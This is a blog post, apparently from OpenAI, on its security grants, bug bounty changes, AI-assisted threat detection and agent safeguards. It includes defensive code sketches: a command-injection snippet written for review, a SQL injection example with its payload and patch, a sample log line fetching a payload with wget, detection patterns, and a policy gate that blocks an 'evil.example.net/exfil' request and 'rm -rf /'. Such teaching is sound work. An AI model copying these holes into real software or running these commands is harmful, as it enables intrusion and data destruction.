Security on the Path to AGI
Updates on OpenAI’s Cybersecurity Grant Program, Bug Bounties and Security Initiatives
We’re sharing updates that reflect our progress, our momentum, and our continued commitment to security on the path toward AGI.
Evolving our Cybersecurity Grant Program
Since launching the Cybersecurity Grant Program two years ago, we've reviewed over a thousand applications and funded 28 research initiatives, gaining critical insights into areas like prompt injection, secure code generation and autonomous cybersecurity defenses.
We're continuing to fund bold, innovative projects aimed at advancing the sciences of AI and cybersecurity.
The Cybersecurity Grant Program is now soliciting proposals for a wider range of projects. Priority focus areas for new grant applications include:
- Software patching: Leveraging AI to detect and patch vulnerabilities.
- Model privacy: Enhancing robustness against unintended exposure of private training data.
- Detection and response: Improving detection and response capabilities against advanced persistent threats.
- Security integration: Boosting accuracy and reliability of AI integration with security tools.
- Agentic security: Increasing resilience in AI agents against sophisticated attacks.
We are also introducing microgrants for high-quality proposals: API credits that help researchers quickly prototype innovative cybersecurity ideas and experiments.
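As one illustration of the scale of experiment these credits are meant to support, here is a minimal sketch, written by us for this post, that uses the OpenAI Python SDK to ask a model to triage a short code snippet for a vulnerability. The model name, prompt wording and snippet are illustrative assumptions, not program requirements.

```python
# Minimal microgrant-scale prototype sketch: ask a model to review a code
# snippet for vulnerabilities. The model name, prompt wording and snippet
# are illustrative assumptions, not program requirements.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

SNIPPET = '''
import subprocess

def ping(host):
    # User-controlled input reaches a shell (command injection, CWE-78).
    return subprocess.run("ping -c 1 " + host, shell=True, capture_output=True)
'''

response = client.chat.completions.create(
    model="gpt-4o",  # placeholder; any capable model works
    messages=[
        {"role": "system",
         "content": "You are a security reviewer. Identify any vulnerability, "
                    "name its CWE class, and propose a patch."},
        {"role": "user", "content": SNIPPET},
    ],
)
print(response.choices[0].message.content)
```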
If you are interested in participating, we invite you to submit a proposal here.
Open-source security research
In addition to the Cybersecurity Grant Program, we engage researchers and practitioners throughout the cybersecurity community, which lets us draw on the latest thinking and share our findings with those working toward a more secure digital world. To train our models, we partner with experts across academic, government and commercial labs to benchmark skills gaps and to obtain structured examples of advanced reasoning across cybersecurity domains.

This collaboration has yielded strong results in areas such as code security, where we intend to lead the industry in our models’ ability to find and patch vulnerabilities in code. We have internally demonstrated state-of-the-art capability here, with industry-leading scores on public benchmarks. We have also found vulnerabilities in open-source code, and we will release security disclosures to the relevant open-source maintainers as we identify issues and scale.
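To make “find and patch vulnerabilities in code” concrete, the sketch below shows a classic instance of the class of bug involved: a SQL injection introduced by string interpolation, alongside the parameterized-query patch. The example is ours, not drawn from any actual disclosure.

```python
import sqlite3

# Vulnerable: user input is interpolated directly into the SQL string, so a
# username like "x' OR '1'='1" changes the query's meaning (CWE-89).
def get_user_vulnerable(conn: sqlite3.Connection, username: str):
    return conn.execute(
        f"SELECT * FROM users WHERE name = '{username}'"
    ).fetchone()

# Patched: a parameterized query keeps user input as data, never as SQL.
def get_user_patched(conn: sqlite3.Connection, username: str):
    return conn.execute(
        "SELECT * FROM users WHERE name = ?", (username,)
    ).fetchone()

# Tiny demo against an in-memory database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")
payload = "x' OR '1'='1"
print(get_user_vulnerable(conn, payload))  # ('alice',): the injection matched every row
print(get_user_patched(conn, payload))     # None: the payload stayed plain data
```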
Expanding our Security Bug Bounty Program
Our Security Bug Bounty Program rewards security researchers for responsibly identifying vulnerabilities and threats within our infrastructure and products. We are making program enhancements to better address evolving threats.
Increased maximum bug bounty payouts
We are significantly increasing the maximum bounty payout for exceptional and differentiated critical findings to $100,000 (previously $20,000). This increase reflects our commitment to rewarding meaningful, high-impact security research that helps us protect users and maintain trust in our systems.
Bonus promotion period
To celebrate the expansion of our bug bounty program, we’re launching limited-time promotions. During promotional periods, researchers who submit qualifying reports within specific categories will be eligible for additional bounty bonuses. Each promotional category has specific, clearly defined eligibility criteria and timelines, which you can view on our Bug Bounty Program page.
Security threats evolve constantly, and as we get closer to AGI we expect our adversaries to become more numerous and more persistent. At OpenAI, we proactively adapt in multiple ways, including by building comprehensive security measures directly into our infrastructure and models.
AI-powered cyber defense
To protect our users, systems and intellectual property, we’re leveraging our own AI technology to scale our cyber defenses, and we have developed advanced methods to detect cyber threats and respond to them rapidly. Alongside conventional threat detection and incident response strategies, our AI-driven security agents help enhance threat detection, enable rapid response to evolving adversarial tactics, and equip security teams with the precise, actionable intelligence they need to counter sophisticated cyberattacks.
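As a purely illustrative sketch of how an AI-driven step can sit alongside conventional detection (none of this reflects OpenAI’s internal tooling), the example below uses a cheap rule-based filter to surface candidate log lines and a model call to triage them for a human responder. The model name, rules and log lines are all our assumptions.

```python
# Hypothetical sketch of AI-assisted alert triage. A conventional rule-based
# filter surfaces candidates; a model groups and prioritizes them.
import json
from openai import OpenAI

client = OpenAI()

def rule_based_candidates(log_lines: list[str]) -> list[str]:
    """Cheap conventional filter: flag repeated failed logins and odd downloads."""
    suspicious = ("Failed password", "wget http", "chmod +x /tmp")
    return [line for line in log_lines if any(s in line for s in suspicious)]

def triage(candidates: list[str]) -> str:
    """Ask a model to cluster the flagged lines and suggest next steps."""
    response = client.chat.completions.create(
        model="gpt-4o",  # placeholder model name
        messages=[
            {"role": "system",
             "content": "You are a SOC analyst. Group these log lines by likely "
                        "technique, rate severity, and suggest a next step."},
            {"role": "user", "content": json.dumps(candidates)},
        ],
    )
    return response.choices[0].message.content

logs = [
    "sshd: Failed password for root from 203.0.113.7 port 52110",
    "sshd: Failed password for root from 203.0.113.7 port 52111",
    "bash: wget http://203.0.113.9/payload.sh -O /tmp/p.sh",
    "cron: job 42 completed normally",
]
print(triage(rule_based_candidates(logs)))
```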
Continuous adversarial red teaming
We have partnered with SpecterOps, renowned experts in security research and adversarial operations, to rigorously test our security defenses through realistic simulated attacks across our infrastructure, including corporate, cloud and production environments. These continuous assessments help us identify vulnerabilities proactively, enhance our detection capabilities, and strengthen our response strategies against sophisticated threats. Beyond these assessments, we are also collaborating on advanced skills training that extends our models’ capabilities with additional techniques for protecting our products and models.
Disrupting threat actors and proactively combating malicious AI abuse
We continuously monitor and disrupt attempts by malicious actors to exploit our technologies. When we identify threats targeting us, such as a recent spear-phishing campaign aimed at our employees, we don’t just defend ourselves; we share tradecraft with other AI labs to strengthen our collective defenses. By sharing these emerging risks and collaborating across industry and government, we help ensure AI technologies are developed and deployed securely.
Securing emerging AI agents
As we introduce advanced AI agents such as Operator and deep research, we invest in understanding and mitigating the unique security and resilience challenges these technologies raise. Our efforts include developing robust alignment methods to defend against prompt injection attacks, strengthening underlying infrastructure security, and implementing agent monitoring controls to quickly detect and mitigate unintended or harmful behaviors. As part of this, we’re building a unified pipeline and modular framework that provides scalable, real-time visibility and enforcement across agent actions and form factors.
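The sketch below illustrates one simple form such per-action enforcement could take: a policy gate that sits between an agent’s decision and its execution, blocking shell commands and unapproved network destinations. The action schema and rules are our illustrative assumptions, not OpenAI’s actual framework.

```python
# Hypothetical per-action policy gate for an AI agent; the action schema
# and rules are illustrative assumptions, not OpenAI's actual framework.
from dataclasses import dataclass
from urllib.parse import urlparse

@dataclass
class AgentAction:
    kind: str      # e.g. "http_get", "shell", "file_write"
    target: str    # URL, command, or path

ALLOWED_DOMAINS = {"api.example.com", "docs.example.com"}  # assumed allow-list

def enforce(action: AgentAction) -> bool:
    """Return True if the action may proceed; log and block otherwise."""
    if action.kind == "shell":
        # This sketch blocks arbitrary shell execution outright.
        print(f"BLOCKED shell command: {action.target!r}")
        return False
    if action.kind == "http_get":
        host = urlparse(action.target).hostname or ""
        if host not in ALLOWED_DOMAINS:
            print(f"BLOCKED request to unapproved host: {host!r}")
            return False
    return True

# The gate runs on every proposed action before the agent executes it.
for act in (AgentAction("http_get", "https://api.example.com/v1/data"),
            AgentAction("http_get", "https://evil.example.net/exfil"),
            AgentAction("shell", "rm -rf /")):
    print(act.kind, act.target, "->", "allowed" if enforce(act) else "denied")
```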
Security for future AI initiatives
Security is a cornerstone in the design and implementation of next-generation AI projects such as Stargate. We work with our partners to adopt industry-leading security practices such as zero-trust architectures and hardware-backed security solutions. Where we are substantially expanding our physical infrastructure, we work closely with our partners to ensure our physical safeguards evolve in tandem with our AI capabilities. These strategies include advanced access controls, comprehensive security monitoring, cryptographic protections, and defense in depth. Combined with a focus on securing software and hardware supply chains, these practices help build foundational security from the ground up.
Expanding our security program
We are growing our security program across several dimensions and are looking for passionate engineers in many areas. If you are interested in protecting OpenAI and our customers, and in building the future of secure and trustworthy AI, we’d love to hear from you!
Achieving our mission requires more than groundbreaking technology; it demands robust, continually evolving security practices. As our models rapidly advance, with capabilities well beyond where we stood even six months ago, our responsibility to strengthen security measures grows in step.
Today, we serve more than 400 million weekly active users across businesses, enterprises and governments worldwide. This scale brings a crucial obligation to safeguard the systems, intellectual property and data our users entrust to us.
At OpenAI, security is a deep-rooted commitment that strengthens as our models and products advance. We remain fully dedicated to a proactive, transparent approach, driven by rigorous testing, collaborative research, and a clear goal: ensuring the secure, responsible and beneficial development of AGI.